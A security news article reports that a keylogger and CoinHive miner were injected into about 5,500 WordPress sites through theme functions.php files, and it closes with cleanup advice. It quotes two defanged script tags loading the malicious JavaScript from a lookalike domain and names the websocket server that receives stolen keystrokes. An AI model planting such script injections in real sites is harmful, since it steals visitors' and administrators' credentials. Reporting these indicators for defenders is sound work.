More than 5,500 WordPress sites are infected with a Keylogger

Hackers aim to steal credentials from WordPress users

Experts have found a malicious script which can track keystrokes and additionally infiltrate a cryptocurrency miner to WordPress sites. According to the analysts, it is loaded from Cloudflare.solutions domain^[1]. At the time of writing, it has already infected more than 5,500 WordPress websites. Note that Cloudflare company is not linked to this malevolent activity in any way.

Private individuals widely use WordPress to create personal websites or blogs. Likewise, hackers can log valuable information, such as log-in names, passwords, email addresses, etc. However, some companies also use its services to launch their online shops. Therefore, criminals can steal credit or debit card details with the help of a keylogger as well^[2].

Additionally, the malicious script is loaded on WordPress back-end and front-end allowing to steal admin's username and password when logging into the panel. The codes which are known to infuse the keylogger are the following:

1. < script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >;
2. < script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >.

Attackers hid the malicious code inside functions.php file

According to Denis Sinegubko, a senior malware analyst at Sucuri, the script resides in the functions.php file which is found in all WordPress themes. The fact that they hid the code in a legitimate file only makes it harder to detect the keylogger. Thus, currently, almost 5,496 WordPress sites are infected.

The stolen data is sent to wss://cloudflare[.]solutions:8085/ remote server. Likewise, cybersecurity researchers from Sucuri detected that the developers of the malicious codes were not new to the cyber community. They have been active since April and successfully performed at least three attacks.

The criminals first appeared in April, when they used cors.js script to deliver banner ads on compromised websites^[3]. However, now the code is altered to do not display them and avoid any suspicions.

Furthermore, hackers developed malicious scripts which were disguised under the name of jQuery and Google Analytics in November. Those JavaScript files were designed to drop CoinHive JavaScript Monero miners on infected pages and generate cryptocurrency such as Bitcoin, Litecoin, etc^[4].

Experts note that the previous bogus codes are kept intact. What is changed is that the crooks added a keylogger add-on to generate even more illegal profits from innocent people.

Mitigation advise for infected WordPress sites owners

The first thing the victims are advised to do it to change all passwords and usernames which might be compromised. Additionally, it is wise to contact bank authorities and inform about the possible issue to stop any illegal transactions from your bank account.

Sucuri experts also encourage you to take the following measures^[5]:

As we already mentioned, the malicious code resides in the function.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.